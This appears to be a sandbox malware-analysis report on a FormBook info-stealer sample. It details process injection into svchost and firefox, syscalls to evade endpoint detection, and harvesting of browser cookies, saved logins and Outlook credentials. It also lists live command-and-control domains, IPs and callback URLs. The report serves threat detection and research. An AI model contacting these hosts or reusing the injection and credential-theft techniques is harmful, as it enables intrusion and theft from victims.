            Source: C:\Program Files (x86)\fqYQveWkZrbDifqWhVUXFYnzOPZnZwaGxgEupZiYnntGhIVrAxrDtRntVbKLEWbsmuLoiDaVmFlLY\XWXkhXRHcDkPdE.exeNtProtectVirtualMemory: Direct from: 0x76F02F9CJump to behavior
            Source: C:\Program Files (x86)\fqYQveWkZrbDifqWhVUXFYnzOPZnZwaGxgEupZiYnntGhIVrAxrDtRntVbKLEWbsmuLoiDaVmFlLY\XWXkhXRHcDkPdE.exeNtSetInformationProcess: Direct from: 0x76F02C5CJump to behavior
            Source: C:\Program Files (x86)\fqYQveWkZrbDifqWhVUXFYnzOPZnZwaGxgEupZiYnntGhIVrAxrDtRntVbKLEWbsmuLoiDaVmFlLY\XWXkhXRHcDkPdE.exeNtNotifyChangeKey: Direct from: 0x76F03C2CJump to behavior
            Source: C:\Program Files (x86)\fqYQveWkZrbDifqWhVUXFYnzOPZnZwaGxgEupZiYnntGhIVrAxrDtRntVbKLEWbsmuLoiDaVmFlLY\XWXkhXRHcDkPdE.exeNtCreateMutant: Direct from: 0x76F035CCJump to behavior
            Source: C:\Program Files (x86)\fqYQveWkZrbDifqWhVUXFYnzOPZnZwaGxgEupZiYnntGhIVrAxrDtRntVbKLEWbsmuLoiDaVmFlLY\XWXkhXRHcDkPdE.exeNtWriteVirtualMemory: Direct from: 0x76F02E3CJump to behavior
            Source: C:\Program Files (x86)\fqYQveWkZrbDifqWhVUXFYnzOPZnZwaGxgEupZiYnntGhIVrAxrDtRntVbKLEWbsmuLoiDaVmFlLY\XWXkhXRHcDkPdE.exeNtMapViewOfSection: Direct from: 0x76F02D1CJump to behavior
            Source: C:\Program Files (x86)\fqYQveWkZrbDifqWhVUXFYnzOPZnZwaGxgEupZiYnntGhIVrAxrDtRntVbKLEWbsmuLoiDaVmFlLY\XWXkhXRHcDkPdE.exeNtResumeThread: Direct from: 0x76F036ACJump to behavior
            Source: C:\Program Files (x86)\fqYQveWkZrbDifqWhVUXFYnzOPZnZwaGxgEupZiYnntGhIVrAxrDtRntVbKLEWbsmuLoiDaVmFlLY\XWXkhXRHcDkPdE.exeNtAllocateVirtualMemory: Direct from: 0x76F02BFCJump to behavior
            Source: C:\Program Files (x86)\fqYQveWkZrbDifqWhVUXFYnzOPZnZwaGxgEupZiYnntGhIVrAxrDtRntVbKLEWbsmuLoiDaVmFlLY\XWXkhXRHcDkPdE.exeNtReadFile: Direct from: 0x76F02ADCJump to behavior
            Source: C:\Program Files (x86)\fqYQveWkZrbDifqWhVUXFYnzOPZnZwaGxgEupZiYnntGhIVrAxrDtRntVbKLEWbsmuLoiDaVmFlLY\XWXkhXRHcDkPdE.exeNtQuerySystemInformation: Direct from: 0x76F02DFCJump to behavior
            Source: C:\Program Files (x86)\fqYQveWkZrbDifqWhVUXFYnzOPZnZwaGxgEupZiYnntGhIVrAxrDtRntVbKLEWbsmuLoiDaVmFlLY\XWXkhXRHcDkPdE.exeNtDelayExecution: Direct from: 0x76F02DDCJump to behavior
            Source: C:\Program Files (x86)\fqYQveWkZrbDifqWhVUXFYnzOPZnZwaGxgEupZiYnntGhIVrAxrDtRntVbKLEWbsmuLoiDaVmFlLY\XWXkhXRHcDkPdE.exeNtQueryInformationProcess: Direct from: 0x76F02C26Jump to behavior
            Source: C:\Program Files (x86)\fqYQveWkZrbDifqWhVUXFYnzOPZnZwaGxgEupZiYnntGhIVrAxrDtRntVbKLEWbsmuLoiDaVmFlLY\XWXkhXRHcDkPdE.exeNtResumeThread: Direct from: 0x76F02FBCJump to behavior
            Source: C:\Program Files (x86)\fqYQveWkZrbDifqWhVUXFYnzOPZnZwaGxgEupZiYnntGhIVrAxrDtRntVbKLEWbsmuLoiDaVmFlLY\XWXkhXRHcDkPdE.exeNtCreateUserProcess: Direct from: 0x76F0371CJump to behavior
            Maps a DLL or memory area into another process
            Source: C:\Users\user\Desktop\8htbxM8GPX.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Program Files (x86)\fqYQveWkZrbDifqWhVUXFYnzOPZnZwaGxgEupZiYnntGhIVrAxrDtRntVbKLEWbsmuLoiDaVmFlLY\XWXkhXRHcDkPdE.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Windows\SysWOW64\netbtugc.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: NULL target: C:\Program Files (x86)\fqYQveWkZrbDifqWhVUXFYnzOPZnZwaGxgEupZiYnntGhIVrAxrDtRntVbKLEWbsmuLoiDaVmFlLY\XWXkhXRHcDkPdE.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: NULL target: C:\Program Files (x86)\fqYQveWkZrbDifqWhVUXFYnzOPZnZwaGxgEupZiYnntGhIVrAxrDtRntVbKLEWbsmuLoiDaVmFlLY\XWXkhXRHcDkPdE.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
            Modifies the context of a thread in another process (thread injection)
            Source: C:\Windows\SysWOW64\netbtugc.exeThread register set: target process: 8048Jump to behavior
            Queues an APC in another process (thread injection)
            Source: C:\Windows\SysWOW64\netbtugc.exeThread APC queued: target process: C:\Program Files (x86)\fqYQveWkZrbDifqWhVUXFYnzOPZnZwaGxgEupZiYnntGhIVrAxrDtRntVbKLEWbsmuLoiDaVmFlLY\XWXkhXRHcDkPdE.exeJump to behavior
            Writes to foreign memory regions
            Source: C:\Users\user\Desktop\8htbxM8GPX.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 2EF6008Jump to behavior
            Source: C:\Users\user\Desktop\8htbxM8GPX.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\8htbxM8GPX.exe"Jump to behavior
            Source: C:\Program Files (x86)\fqYQveWkZrbDifqWhVUXFYnzOPZnZwaGxgEupZiYnntGhIVrAxrDtRntVbKLEWbsmuLoiDaVmFlLY\XWXkhXRHcDkPdE.exeProcess created: C:\Windows\SysWOW64\netbtugc.exe "C:\Windows\SysWOW64\netbtugc.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: 8htbxM8GPX.exeBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
            Source: XWXkhXRHcDkPdE.exe, 00000005.00000002.4191004793.0000000001150000.00000002.00000001.00040000.00000000.sdmp, XWXkhXRHcDkPdE.exe, 00000005.00000000.1937662711.0000000001151000.00000002.00000001.00040000.00000000.sdmp, XWXkhXRHcDkPdE.exe, 00000007.00000002.4191212002.0000000001AF0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
            Source: XWXkhXRHcDkPdE.exe, 00000005.00000002.4191004793.0000000001150000.00000002.00000001.00040000.00000000.sdmp, XWXkhXRHcDkPdE.exe, 00000005.00000000.1937662711.0000000001151000.00000002.00000001.00040000.00000000.sdmp, XWXkhXRHcDkPdE.exe, 00000007.00000002.4191212002.0000000001AF0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
            Source: XWXkhXRHcDkPdE.exe, 00000005.00000002.4191004793.0000000001150000.00000002.00000001.00040000.00000000.sdmp, XWXkhXRHcDkPdE.exe, 00000005.00000000.1937662711.0000000001151000.00000002.00000001.00040000.00000000.sdmp, XWXkhXRHcDkPdE.exe, 00000007.00000002.4191212002.0000000001AF0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
            Source: XWXkhXRHcDkPdE.exe, 00000005.00000002.4191004793.0000000001150000.00000002.00000001.00040000.00000000.sdmp, XWXkhXRHcDkPdE.exe, 00000005.00000000.1937662711.0000000001151000.00000002.00000001.00040000.00000000.sdmp, XWXkhXRHcDkPdE.exe, 00000007.00000002.4191212002.0000000001AF0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: }Program Manager

            Stealing of Sensitive Information

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000006.00000002.4190605471.0000000002850000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.2013386814.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.4190174668.0000000000410000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.4190493627.0000000002800000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.2018221773.0000000003D90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.4193347183.00000000059A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.4191461171.00000000027F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.2018302081.0000000003DE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Tries to harvest and steal browser information (history, passwords, etc)
            Source: C:\Windows\SysWOW64\netbtugc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
            Tries to steal Mail credentials (via file / registry access)
            Source: C:\Windows\SysWOW64\netbtugc.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior

            Remote Access Functionality

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000006.00000002.4190605471.0000000002850000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.2013386814.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.4190174668.0000000000410000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.4190493627.0000000002800000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.2018221773.0000000003D90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.4193347183.00000000059A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.4191461171.00000000027F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.2018302081.0000000003DE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
            DLL Side-Loading            		412
            Process Injection            		2
            Virtualization/Sandbox Evasion            		1
            OS Credential Dumping            		121
            Security Software Discovery            		Remote Services1
            Email Collection            		1
            Encrypted Channel            		Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
            Abuse Elevation Control Mechanism            		412
            Process Injection            		LSASS Memory2
            Virtualization/Sandbox Evasion            		Remote Desktop Protocol1
            Archive Collected Data            		3
            Ingress Tool Transfer            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
            DLL Side-Loading            		1
            Deobfuscate/Decode Files or Information            		Security Account Manager2
            Process Discovery            		SMB/Windows Admin Shares1
            Data from Local System            		4
            Non-Application Layer Protocol            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
            Abuse Elevation Control Mechanism            		NTDS1
            Application Window Discovery            		Distributed Component Object ModelInput Capture4
            Application Layer Protocol            		Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script3
            Obfuscated Files or Information            		LSA Secrets2
            File and Directory Discovery            		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
            DLL Side-Loading            		Cached Domain Credentials12
            System Information Discovery            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1501659 Sample: 8htbxM8GPX.exe Startdate: 30/08/2024 Architecture: WINDOWS Score: 100 28 www.techchains.info 2->28 30 www.rssnewscast.com 2->30 32 14 other IPs or domains 2->32 42 Suricata IDS alerts for network traffic 2->42 44 Malicious sample detected (through community Yara rule) 2->44 46 Antivirus detection for URL or domain 2->46 48 5 other signatures 2->48 10 8htbxM8GPX.exe 4 2->10         started        signatures3 process4 signatures5 60 Binary is likely a compiled AutoIt script file 10->60 62 Writes to foreign memory regions 10->62 64 Maps a DLL or memory area into another process 10->64 66 Switches to a custom stack to bypass stack traces 10->66 13 svchost.exe 10->13         started        process6 signatures7 68 Maps a DLL or memory area into another process 13->68 16 XWXkhXRHcDkPdE.exe 13->16 injected process8 signatures9 40 Found direct / indirect Syscall (likely to bypass EDR) 16->40 19 netbtugc.exe 13 16->19         started        process10 signatures11 50 Tries to steal Mail credentials (via file / registry access) 19->50 52 Tries to harvest and steal browser information (history, passwords, etc) 19->52 54 Modifies the context of a thread in another process (thread injection) 19->54 56 3 other signatures 19->56 22 XWXkhXRHcDkPdE.exe 19->22 injected 26 firefox.exe 19->26         started        process12 dnsIp13 34 www.liangyuen528.com 15.197.212.58, 49754, 49755, 49756 TANDEMUS United States 22->34 36 www.donnavariedades.com 15.197.240.20, 49766, 49767, 49768 TANDEMUS United States 22->36 38 7 other IPs or domains 22->38 58 Found direct / indirect Syscall (likely to bypass EDR) 22->58 signatures14

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            8htbxM8GPX.exe63%ReversingLabsWin32.Backdoor.FormBook
            8htbxM8GPX.exe100%Joe Sandbox ML

            Dropped Files

            No Antivirus matches

            Unpacked PE Files

            No Antivirus matches

            Domains

            No Antivirus matches

            URLs

            SourceDetectionScannerLabelLink
            https://duckduckgo.com/chrome_newtab0%URL Reputationsafe
            https://duckduckgo.com/ac/?q=0%URL Reputationsafe
            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%URL Reputationsafe
            https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
            https://www.ecosia.org/newtab/0%URL Reputationsafe
            https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
            https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0%URL Reputationsafe
            https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%URL Reputationsafe
            http://www.donnavariedades.com0%Avira URL Cloudsafe
            https://www.colorfulbox.jp/common/img/bnr/colorfulbox_bnr01.png0%Avira URL Cloudsafe
            http://www.elettrosistemista.zip/fo8o/?elJtehkH=bO1UBvtoHFNUmlWB4HLJpEjmeTUqQxU1qF418M7UHpKKa2cgLZsmM/SsbGGojtls67Xc6OgTo57aJm1+bsxMLzFMa6Onx1WMpNg/TOHpJ+sdeDHYknqJlyE=&z8_=glwH5BKp100%Avira URL Cloudmalware
            http://www.goldenjade-travel.com/fo8o/?elJtehkH=LFKqyrcu7g1NCa8bLlrIs+M38ZMJrQSprIMLtaWgKJ9bBKQr4dsnyMPFpMQjJLGR7ieyxupOSpv1HbfUaMaF2zMIkigvi6pIX6i8MuAeXHNrENDnI2WJi/4=&z8_=glwH5BKp0%Avira URL Cloudsafe
            https://rakko.cc/3sXd0gW0%Avira URL Cloudsafe
            https://rakko.cc/46n4zu20%Avira URL Cloudsafe
            http://www.liangyuen528.com/fo8o/100%Avira URL Cloudmalware
            https://www.value-domain.com/0%Avira URL Cloudsafe
            https://www.google.com/images/branding/product/ico/googleg_lodp.ico0%Avira URL Cloudsafe
            http://www.elettrosistemista.zip/fo8o/100%Avira URL Cloudmalware
            http://www.donnavariedades.com/fo8o/0%Avira URL Cloudsafe
            http://www.magmadokum.com/fo8o/0%Avira URL Cloudsafe
            https://www.sedo.com/services/parking.php30%Avira URL Cloudsafe
            https://www.name.com/domain/renew/rssnewscast.com?utm_source=Sedo_parked_page&utm_medium=button&utm_0%Avira URL Cloudsafe
            http://www.liangyuen528.com/fo8o/?elJtehkH=iiIkdrB6KYcVQoNzCqChYUKXjXuh+zOUSOc41yM1Q/k97jiJcokuWPbOTxiCodGWiOQkUrp21l37eyMeLTp+WWEI+6zwDYddHqMnjE16qa6vLdOP6EYvTw8=&z8_=glwH5BKp100%Avira URL Cloudmalware
            https://codepen.io/uzcho_/pens/popular/?grid_type=list0%Avira URL Cloudsafe
            http://www.rssnewscast.com/fo8o/0%Avira URL Cloudsafe
            http://www.rssnewscast.com/fo8o/?elJtehkH=x3jV/ECx7FuzXOI+5yB0DB/+zmAHn47HyCIVaqWvGMMqpfz0YC5wLsL1wYxwFH1KuInYTmXKqKNNujOvwtdNuo48jXK1aHHk/BJwdjwjaHe/B0IWhwIR9Wc=&z8_=glwH5BKp0%Avira URL Cloudsafe
            http://www.kasegitai.tokyo/fo8o/100%Avira URL Cloudmalware
            https://codepen.io/uzcho_/pen/eYdmdXw.css0%Avira URL Cloudsafe
            https://www.value-domain.com/modall.php0%Avira URL Cloudsafe
            http://www.kasegitai.tokyo/fo8o/?elJtehkH=0LNqIGaAWMhMIMLOoFJdlTy9f3bq+Isr9lFre+yu3/9GvRNYi1uHmkVftE7qrB4Q/AkDmlcR4eDvWrml8CJ8r/Gn91MhhIPQbbhzQEQvbiAlH2BixgYAz94=&z8_=glwH5BKp100%Avira URL Cloudmalware
            http://www.3xfootball.com/fo8o/?elJtehkH=IhZyPQIGe6uK3zPwzgZotr9BPg6ZX3xlW2eS79Xk6ut4afzj0LiRBEeFtQixSzG192fRs1GD25A478p7nOOn1bCAV966J7ZkoXS5ptBuz2edhBZoh3xN24c=&z8_=glwH5BKp0%Avira URL Cloudsafe
            http://www.donnavariedades.com/fo8o/?elJtehkH=l+301ZvITCxaX9AA4lYSKJRm7SqH4t3JgzctOQx29qSsrxX8kw49ykgmumiYYU42xMGxVig5KVZrJosPbs9pFAmOdnck9fouhB1RUuBib5vZojQkCZCqKk0=&z8_=glwH5BKp0%Avira URL Cloudsafe
            http://www.techchains.info/fo8o/100%Avira URL Cloudphishing
            http://www.goldenjade-travel.com/fo8o/0%Avira URL Cloudsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            elettrosistemista.zip
            		195.110.124.133
            		truetrue
              		unknown
              www.donnavariedades.com
              		15.197.240.20
              		truetrue
                		unknown
                empowermedeco.com
                		217.196.55.202
                		truefalse
                  		unknown
                  www.3xfootball.com
                  		154.215.72.110
                  		truetrue
                    		unknown
                    www.goldenjade-travel.com
                    		116.50.37.244
                    		truetrue
                      		unknown
                      www.rssnewscast.com
                      		91.195.240.94
                      		truetrue
                        		unknown
                        www.techchains.info
                        		66.29.149.46
                        		truetrue
                          		unknown
                          www.liangyuen528.com
                          		15.197.212.58
                          		truetrue
                            		unknown
                            natroredirect.natrocdn.com
                            		85.159.66.93
                            		truetrue
                              		unknown
                              www.kasegitai.tokyo
                              		54.65.172.3
                              		truetrue
                                		unknown
                                www.empowermedeco.com
                                		unknown
                                		unknowntrue
                                  		unknown
                                  www.magmadokum.com
                                  		unknown
                                  		unknowntrue
                                    		unknown
                                    www.660danm.top
                                    		unknown
                                    		unknowntrue
                                      		unknown
                                      www.elettrosistemista.zip
                                      		unknown
                                      		unknowntrue
                                        		unknown
                                        www.antonio-vivaldi.mobi
                                        		unknown
                                        		unknowntrue
                                          		unknown

                                          Contacted URLs

                                          NameMaliciousAntivirus DetectionReputation
                                          http://www.elettrosistemista.zip/fo8o/?elJtehkH=bO1UBvtoHFNUmlWB4HLJpEjmeTUqQxU1qF418M7UHpKKa2cgLZsmM/SsbGGojtls67Xc6OgTo57aJm1+bsxMLzFMa6Onx1WMpNg/TOHpJ+sdeDHYknqJlyE=&z8_=glwH5BKptrue
                                          • Avira URL Cloud: malware
                                          		unknown
                                          http://www.goldenjade-travel.com/fo8o/?elJtehkH=LFKqyrcu7g1NCa8bLlrIs+M38ZMJrQSprIMLtaWgKJ9bBKQr4dsnyMPFpMQjJLGR7ieyxupOSpv1HbfUaMaF2zMIkigvi6pIX6i8MuAeXHNrENDnI2WJi/4=&z8_=glwH5BKptrue
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.liangyuen528.com/fo8o/true
                                          • Avira URL Cloud: malware
                                          		unknown
                                          http://www.elettrosistemista.zip/fo8o/true
                                          • Avira URL Cloud: malware
                                          		unknown
                                          http://www.donnavariedades.com/fo8o/true
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.magmadokum.com/fo8o/true
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.rssnewscast.com/fo8o/true
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.rssnewscast.com/fo8o/?elJtehkH=x3jV/ECx7FuzXOI+5yB0DB/+zmAHn47HyCIVaqWvGMMqpfz0YC5wLsL1wYxwFH1KuInYTmXKqKNNujOvwtdNuo48jXK1aHHk/BJwdjwjaHe/B0IWhwIR9Wc=&z8_=glwH5BKptrue
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.liangyuen528.com/fo8o/?elJtehkH=iiIkdrB6KYcVQoNzCqChYUKXjXuh+zOUSOc41yM1Q/k97jiJcokuWPbOTxiCodGWiOQkUrp21l37eyMeLTp+WWEI+6zwDYddHqMnjE16qa6vLdOP6EYvTw8=&z8_=glwH5BKptrue
                                          • Avira URL Cloud: malware
                                          		unknown
                                          http://www.kasegitai.tokyo/fo8o/true
                                          • Avira URL Cloud: malware
                                          		unknown
                                          http://www.kasegitai.tokyo/fo8o/?elJtehkH=0LNqIGaAWMhMIMLOoFJdlTy9f3bq+Isr9lFre+yu3/9GvRNYi1uHmkVftE7qrB4Q/AkDmlcR4eDvWrml8CJ8r/Gn91MhhIPQbbhzQEQvbiAlH2BixgYAz94=&z8_=glwH5BKptrue
                                          • Avira URL Cloud: malware
                                          		unknown
                                          http://www.3xfootball.com/fo8o/?elJtehkH=IhZyPQIGe6uK3zPwzgZotr9BPg6ZX3xlW2eS79Xk6ut4afzj0LiRBEeFtQixSzG192fRs1GD25A478p7nOOn1bCAV966J7ZkoXS5ptBuz2edhBZoh3xN24c=&z8_=glwH5BKptrue
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.donnavariedades.com/fo8o/?elJtehkH=l+301ZvITCxaX9AA4lYSKJRm7SqH4t3JgzctOQx29qSsrxX8kw49ykgmumiYYU42xMGxVig5KVZrJosPbs9pFAmOdnck9fouhB1RUuBib5vZojQkCZCqKk0=&z8_=glwH5BKptrue
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.goldenjade-travel.com/fo8o/true
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.techchains.info/fo8o/true
                                          • Avira URL Cloud: phishing
                                          		unknown

                                          URLs from Memory and Binaries

                                          NameSourceMaliciousAntivirus DetectionReputation
                                          http://www.donnavariedades.comXWXkhXRHcDkPdE.exe, 00000007.00000002.4193347183.0000000005A18000.00000040.80000000.00040000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          https://duckduckgo.com/chrome_newtabnetbtugc.exe, 00000006.00000003.2203005863.000000000768E000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          https://duckduckgo.com/ac/?q=netbtugc.exe, 00000006.00000003.2203005863.000000000768E000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          https://rakko.cc/46n4zu2netbtugc.exe, 00000006.00000002.4192324042.0000000003986000.00000004.10000000.00040000.00000000.sdmp, XWXkhXRHcDkPdE.exe, 00000007.00000002.4191748886.0000000003AE6000.00000004.00000001.00040000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          https://www.google.com/images/branding/product/ico/googleg_lodp.iconetbtugc.exe, 00000006.00000003.2203005863.000000000768E000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          https://rakko.cc/3sXd0gWnetbtugc.exe, 00000006.00000002.4192324042.0000000003986000.00000004.10000000.00040000.00000000.sdmp, XWXkhXRHcDkPdE.exe, 00000007.00000002.4191748886.0000000003AE6000.00000004.00000001.00040000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          https://www.value-domain.com/netbtugc.exe, 00000006.00000002.4192324042.0000000003986000.00000004.10000000.00040000.00000000.sdmp, XWXkhXRHcDkPdE.exe, 00000007.00000002.4191748886.0000000003AE6000.00000004.00000001.00040000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          https://www.colorfulbox.jp/common/img/bnr/colorfulbox_bnr01.pngnetbtugc.exe, 00000006.00000002.4192324042.0000000003986000.00000004.10000000.00040000.00000000.sdmp, XWXkhXRHcDkPdE.exe, 00000007.00000002.4191748886.0000000003AE6000.00000004.00000001.00040000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=netbtugc.exe, 00000006.00000003.2203005863.000000000768E000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=netbtugc.exe, 00000006.00000003.2203005863.000000000768E000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          https://www.ecosia.org/newtab/netbtugc.exe, 00000006.00000003.2203005863.000000000768E000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          https://www.name.com/domain/renew/rssnewscast.com?utm_source=Sedo_parked_page&utm_medium=button&utm_netbtugc.exe, 00000006.00000002.4193895794.0000000005C40000.00000004.00000800.00020000.00000000.sdmp, netbtugc.exe, 00000006.00000002.4192324042.0000000003FCE000.00000004.10000000.00040000.00000000.sdmp, XWXkhXRHcDkPdE.exe, 00000007.00000002.4191748886.000000000412E000.00000004.00000001.00040000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          https://www.sedo.com/services/parking.php3XWXkhXRHcDkPdE.exe, 00000007.00000002.4191748886.000000000412E000.00000004.00000001.00040000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          https://ac.ecosia.org/autocomplete?q=netbtugc.exe, 00000006.00000003.2203005863.000000000768E000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
